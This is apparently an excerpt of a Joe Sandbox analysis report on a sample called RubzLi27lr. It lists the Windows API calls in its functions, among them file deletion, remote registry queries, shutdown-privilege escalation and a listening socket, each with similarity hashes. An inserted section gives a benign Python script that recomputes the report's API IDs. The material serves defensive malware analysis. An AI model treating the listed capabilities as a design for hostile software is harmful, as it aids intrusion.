• FindNextFileW.KERNEL32(00000000,?), ref: 00B29819
• FindClose.KERNEL32(00000000), ref: 00B29824
• FindFirstFileW.KERNEL32(*.*,?), ref: 00B29840
• SetCurrentDirectoryW.KERNEL32(?), ref: 00B29890
• SetCurrentDirectoryW.KERNEL32(00B76B7C), ref: 00B298AE
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00B298B8
• FindClose.KERNEL32(00000000), ref: 00B298C5
• FindClose.KERNEL32(00000000), ref: 00B298D5
  • Part of subcall function 00B1DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B1DB00
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                  • String ID: *.*
                                                                                                                  • API String ID: 2640511053-438819550
                                                                                                                  • Opcode ID: 3845af7bbdf966603016160dd0e1acf2c7b2adf62bae26b2f20bacb0ba8fdf25
                                                                                                                  • Instruction ID: ec0ef97ae83ad72b5a0d1bf3ae7b0e75f8bc80721238c9d09e37a71d43939b23
                                                                                                                  • Opcode Fuzzy Hash: 3845af7bbdf966603016160dd0e1acf2c7b2adf62bae26b2f20bacb0ba8fdf25
                                                                                                                  • Instruction Fuzzy Hash: CA3103315016296ADB14EFB4EC48ADE37ECEF06760F1841E6E81CE71E0DB70DE448A24
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00B3C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B3B6AE,?,?), ref: 00B3C9B5
                                                                                                                    • Part of subcall function 00B3C998: _wcslen.LIBCMT ref: 00B3C9F1
                                                                                                                    • Part of subcall function 00B3C998: _wcslen.LIBCMT ref: 00B3CA68
                                                                                                                    • Part of subcall function 00B3C998: _wcslen.LIBCMT ref: 00B3CA9E
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B3BF3E
                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00B3BFA9
                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00B3BFCD
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B3C02C
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00B3C0E7
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00B3C154
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00B3C1E9
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00B3C23A
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00B3C2E3
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B3C382
                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00B3C38F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3102970594-0
                                                                                                                  • Opcode ID: ef6ba26be2570d085bb50b958f013c218893cfa71296bacc348ec02d615a1120
                                                                                                                  • Instruction ID: 42fa5f993d1facab51000f7732299b40afa4ce380925fbf56066be4e22a7d115
                                                                                                                  • Opcode Fuzzy Hash: ef6ba26be2570d085bb50b958f013c218893cfa71296bacc348ec02d615a1120
                                                                                                                  • Instruction Fuzzy Hash: E9025E716042009FC714DF68C891E2ABBE5EF89314F28C49DF84ADB2A2DB31ED45CB52
                                                                                                                  APIs
                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 00B28257
                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B28267
                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B28273
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B28310
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B28324
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B28356
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B2838C
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B28395
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                  • String ID: *.*
                                                                                                                  • API String ID: 1464919966-438819550
                                                                                                                  • Opcode ID: 92955e99f79e9deb1e430cd8b32e093d40050c9b8b8bd8cca44905db17ed5d2a
                                                                                                                  • Instruction ID: 95b67fcc26fc11ad82c89e1b590e6d26b2d15c5408c740ff8afecae1da555888
                                                                                                                  • Opcode Fuzzy Hash: 92955e99f79e9deb1e430cd8b32e093d40050c9b8b8bd8cca44905db17ed5d2a
                                                                                                                  • Instruction Fuzzy Hash: 4E616B725043559FCB10EF60D8809AEB3ECFF89710F04896EF99A97251EB31E945CB92
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AB3A97,?,?,00AB2E7F,?,?,?,00000000), ref: 00AB3AC2
                                                                                                                    • Part of subcall function 00B1E199: GetFileAttributesW.KERNEL32(?,00B1CF95), ref: 00B1E19A
                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00B1D122
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00B1D1DD
                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00B1D1F0
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 00B1D20D
                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B1D237
                                                                                                                    • Part of subcall function 00B1D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00B1D21C,?,?), ref: 00B1D2B2
                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?), ref: 00B1D253
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00B1D264
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                  • String ID: \*.*
                                                                                                                  • API String ID: 1946585618-1173974218
                                                                                                                  • Opcode ID: c286479eb5969382b28a50d0cc92ec46f18b133ca4ae37b703b0d2b0a21a3eab
                                                                                                                  • Instruction ID: 5c6ca75dcec96c8a356a3ef114b25828f5b74fc4f74146e870bfbd366f320b14
                                                                                                                  • Opcode Fuzzy Hash: c286479eb5969382b28a50d0cc92ec46f18b133ca4ae37b703b0d2b0a21a3eab
                                                                                                                  • Instruction Fuzzy Hash: 5E615E3180110DAFCF05EBE0DA929EEBBB9AF15300F6441A9E41577192EB31AF49DB61
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1737998785-0
                                                                                                                  • Opcode ID: 273acb1cd91856745e1cd497faae389c63a5dd0fc05ed7a967320b4f6a065562
                                                                                                                  • Instruction ID: 4aaa4ef1ccee2ae6d32795d3f816f3e068c0969a2c470d672912318212dec13f
                                                                                                                  • Opcode Fuzzy Hash: 273acb1cd91856745e1cd497faae389c63a5dd0fc05ed7a967320b4f6a065562
                                                                                                                  • Instruction Fuzzy Hash: 7141D035205621AFD320DF16E888F69BBE5FF45328F15C099E4298B762CB71ED42CB90
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00B116C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B1170D
                                                                                                                    • Part of subcall function 00B116C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B1173A
                                                                                                                    • Part of subcall function 00B116C3: GetLastError.KERNEL32 ref: 00B1174A
                                                                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00B1E932
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                  • String ID: $ $@$SeShutdownPrivilege
                                                                                                                  • API String ID: 2234035333-3163812486
                                                                                                                  • Opcode ID: 67529d0278279fad1e3c653f25478fed4e0eeb8c98e28e63c22a86247da39aae
                                                                                                                  • Instruction ID: d93d2e818bf90a6afe9ad7bc78d30cf2a54ce2b4775ee6be9ed0cfeaca083b83
                                                                                                                  • Opcode Fuzzy Hash: 67529d0278279fad1e3c653f25478fed4e0eeb8c98e28e63c22a86247da39aae
                                                                                                                  • Instruction Fuzzy Hash: 40012B32610311ABEB5426749C8ABFF72DCEB18780F5448A2FD23E31D1DAB59DC081A4
                                                                                                                  APIs
                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B31276
                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00B31283
                                                                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00B312BA
                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00B312C5
                                                                                                                  • closesocket.WSOCK32(00000000), ref: 00B312F4
                                                                                                                  • listen.WSOCK32(00000000,00000005), ref: 00B31303
                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00B3130D
                                                                                                                  • closesocket.WSOCK32(00000000), ref: 00B3133C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 540024437-0
                                                                                                                  • Opcode ID: 9c561f67375a1e24c6fc76d9e228da72de3269a21a8be678c9cc28f9c36f18ab
                                                                                                                  • Instruction ID: 89b5417981b660b512fdc06d6485292537788afbe56e111f2188c630c4a14986
                                                                                                                  • Opcode Fuzzy Hash: 9c561f67375a1e24c6fc76d9e228da72de3269a21a8be678c9cc28f9c36f18ab
                                                                                                                  • Instruction Fuzzy Hash: 3F4182356001009FD710DF28C984B6ABBE9FF46714F2885C8E8569F296C771ED81CBA1
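The API ID under each Similarity heading is derived from the function's API list: every API name is broken into fragments, the fragments are counted, and the result is written as frequency groups separated by "$", alphabetical within a group. The following is an added example, not part of the Joe Sandbox report or of Joe Sandbox's own tooling: a small Python script that parses API lines in the format shown above (including "Part of subcall function" lines) and recomputes the API ID. The fragment rules it applies, the NOISE set of dropped prefixes and suffixes (Get, Set, To, Ex, W, Reg, Key, WSA) and the COMPOUNDS pairs kept together (CurrentDirectory, QueryValue), are inferred from the entries on this page and are assumptions, since Joe Sandbox does not document the scheme; the numeric API String ID hash is not reproduced.

```python
"""Recompute Joe Sandbox 'API ID' similarity strings from a function's API list.

Added example; the fragment rules (NOISE, COMPOUNDS) are inferred from this
report's entries and are assumptions, not a documented Joe Sandbox algorithm.
"""
import re
from collections import Counter

# Constructed samples: API lists copied from three function entries in this report.
FILE_ENUM_APIS = """\
• FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00B297BE
• FindNextFileW.KERNEL32(00000000,?), ref: 00B29819
• FindClose.KERNEL32(00000000), ref: 00B29824
• FindFirstFileW.KERNEL32(*.*,?), ref: 00B29840
• SetCurrentDirectoryW.KERNEL32(?), ref: 00B29890
• SetCurrentDirectoryW.KERNEL32(00B76B7C), ref: 00B298AE
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00B298B8
• FindClose.KERNEL32(00000000), ref: 00B298C5
• FindClose.KERNEL32(00000000), ref: 00B298D5
  • Part of subcall function 00B1DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B1DB00
"""

SHUTDOWN_APIS = """\
  • Part of subcall function 00B116C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B1170D
  • Part of subcall function 00B116C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B1173A
  • Part of subcall function 00B116C3: GetLastError.KERNEL32 ref: 00B1174A
• ExitWindowsEx.USER32(?,00000000), ref: 00B1E932
"""

LISTENER_APIS = """\
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B31276
• WSAGetLastError.WSOCK32 ref: 00B31283
• bind.WSOCK32(00000000,?,00000010), ref: 00B312BA
• WSAGetLastError.WSOCK32 ref: 00B312C5
• closesocket.WSOCK32(00000000), ref: 00B312F4
• listen.WSOCK32(00000000,00000005), ref: 00B31303
• WSAGetLastError.WSOCK32 ref: 00B3130D
• closesocket.WSOCK32(00000000), ref: 00B3133C
"""

# One report line: optional bullet, optional subcall prefix, then Name.MODULE(...)
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?([A-Za-z_]\w*)\.(\w+)"
)
# CamelCase splitter: 'WSAGetLastError' -> WSA, Get, Last, Error
CAMEL = re.compile(r"[A-Z]+(?![a-z])|[A-Z][a-z]+")
# Assumption: fragments dropped before counting (verb prefixes, Ex/W suffixes, library prefixes).
NOISE = {"Get", "Set", "To", "Ex", "W", "Reg", "Key", "WSA"}
# Assumption: fragment pairs kept as a single token, as seen in the report's own IDs.
COMPOUNDS = {("Current", "Directory"), ("Query", "Value")}


def parse_api_lines(text):
    """Return (api_name, module) pairs for every API line, subcall lines included."""
    return [m.groups() for m in map(API_LINE.match, text.splitlines()) if m]


def tokenize(api_name):
    """Split one API name into the fragments that get counted."""
    if not any(c.isupper() for c in api_name):
        return [api_name]  # C-style names (socket, bind, closesocket, _wcslen) stay whole
    parts = [p for p in CAMEL.findall(api_name) if p not in NOISE]
    tokens, i = [], 0
    while i < len(parts):
        if i + 1 < len(parts) and (parts[i], parts[i + 1]) in COMPOUNDS:
            tokens.append(parts[i] + parts[i + 1])
            i += 2
        else:
            tokens.append(parts[i])
            i += 1
    return tokens


def api_id(api_names):
    """Fragments grouped by descending count, '$' between groups, ASCII order within a group."""
    counts = Counter(t for name in api_names for t in tokenize(name))
    by_count = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


def api_id_from_report(text):
    """Parse a pasted API block from a report and return its API ID."""
    return api_id([name for name, _module in parse_api_lines(text)])


if __name__ == "__main__":
    for label, sample in (("file enum", FILE_ENUM_APIS), ("shutdown", SHUTDOWN_APIS),
                          ("listener", LISTENER_APIS)):
        print(f"{label:10} {api_id_from_report(sample)}")
```

Run stand-alone, the script prints the same three API IDs the report shows for the file-enumeration, shutdown and listener functions above. Because the ID ignores argument values and call order, it is a cheap way to match an unknown function against these entries (for example the SeShutdownPrivilege/ExitWindowsEx or socket/bind/listen runtime functions of this compiled AutoIt binary) across reports, without relying on the opcode fuzzy hash.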
APIs
• _free.LIBCMT ref: 00AEB9D4
• _free.LIBCMT ref: 00AEB9F8
• _free.LIBCMT ref: 00AEBB7F
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00B53700), ref: 00AEBB91
• WideCharToMultiByte.KERNEL32(00000000,00000000,00B8121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00AEBC09
• WideCharToMultiByte.KERNEL32(00000000,00000000,00B81270,000000FF,?,0000003F,00000000,?), ref: 00AEBC36
• _free.LIBCMT ref: 00AEBD4B
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: _free$ByteCharMultiWide$InformationTimeZone
• String ID:
• API String ID: 314583886-0
• Opcode ID: 266ff78caa37ac314450bcb95fc3aaab013773adc3851ec62800f49a38952aee
• Instruction ID: 65f66854441d24106d1f6ad63d9a5ef2b8f9715e5077a4d1976e9b13f48fccc1
• Opcode Fuzzy Hash: 266ff78caa37ac314450bcb95fc3aaab013773adc3851ec62800f49a38952aee
• Instruction Fuzzy Hash: 7EC14A719142859FCB20DF7A8D49BAB7BBCEF45350F1441AAE494DB262EB309E41C770
APIs
  • Part of subcall function 00AB3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AB3A97,?,?,00AB2E7F,?,?,?,00000000), ref: 00AB3AC2
  • Part of subcall function 00B1E199: GetFileAttributesW.KERNEL32(?,00B1CF95), ref: 00B1E19A
• FindFirstFileW.KERNEL32(?,?), ref: 00B1D420
• DeleteFileW.KERNEL32(?,?,?,?), ref: 00B1D470
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00B1D481
• FindClose.KERNEL32(00000000), ref: 00B1D498
• FindClose.KERNEL32(00000000), ref: 00B1D4A1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
• String ID: \*.*
• API String ID: 2649000838-1173974218
• Opcode ID: 82b836ff5e09818be373fcc428358500daa7d04f3a5ee162c740910f4a8e7543
• Instruction ID: 6f91aa80584e50e5382e20a318a68283141bba032b476f2b5a4768718d448db3
• Opcode Fuzzy Hash: 82b836ff5e09818be373fcc428358500daa7d04f3a5ee162c740910f4a8e7543
• Instruction Fuzzy Hash: 9C318031009341ABC304EF64D9919EFBBECBE96300F844A5DF4D593292EB70AA49D763
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 4168288129-2761157908
• Opcode ID: 30319e50bb5206eafdc7775e295c7493d6f4b4128a4d0de465b6acc5a1898966
• Instruction ID: 8d24adfea5de6f96f5dc3478983156d2069421c6bd4d628318861e236add4500
• Opcode Fuzzy Hash: 30319e50bb5206eafdc7775e295c7493d6f4b4128a4d0de465b6acc5a1898966
• Instruction Fuzzy Hash: ABC25B71E086698FDB25CF29DD407EAB7B5EB48305F1441EAD84EE7280E775AE818F40
APIs
• _wcslen.LIBCMT ref: 00B264DC
• CoInitialize.OLE32(00000000), ref: 00B26639
• CoCreateInstance.OLE32(00B4FCF8,00000000,00000001,00B4FB68,?), ref: 00B26650
• CoUninitialize.OLE32 ref: 00B268D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
• Opcode ID: 794d75333101f0f4f173dee7dc91e5ba57969a1d6bab9b421f0d1f1169e4fd49
• Instruction ID: d98dee484fc54776d605a31862f2d46a9c42133b620dd1bb0655b6950a998412
• Opcode Fuzzy Hash: 794d75333101f0f4f173dee7dc91e5ba57969a1d6bab9b421f0d1f1169e4fd49
• Instruction Fuzzy Hash: 26D15971508311AFC304EF24C9819ABB7E8FF94704F10496DF5998B2A2EB71ED05CBA2
APIs
• GetForegroundWindow.USER32(?,?,00000000), ref: 00B322E8
  • Part of subcall function 00B2E4EC: GetWindowRect.USER32(?,?), ref: 00B2E504
• GetDesktopWindow.USER32 ref: 00B32312
• GetWindowRect.USER32(00000000), ref: 00B32319
• mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00B32355
• GetCursorPos.USER32(?), ref: 00B32381
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00B323DF
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForeground
• String ID:
• API String ID: 2387181109-0
• Opcode ID: bed7446012936dbf4b50a3dc6082278029175c5fcc659074840f5a0bab4a026b
• Instruction ID: 87f874a9e37411869da50dfa05d2e0820f1386ee942cafe81503335a60efa44e
• Opcode Fuzzy Hash: bed7446012936dbf4b50a3dc6082278029175c5fcc659074840f5a0bab4a026b
• Instruction Fuzzy Hash: B3313132505315AFCB20DF14D849F9BBBE9FF84710F100919F999A7181CB30EA08CB92
APIs
  • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
• FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00B29B78
• FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00B29C8B
  • Part of subcall function 00B23874: GetInputState.USER32 ref: 00B238CB
  • Part of subcall function 00B23874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B23966
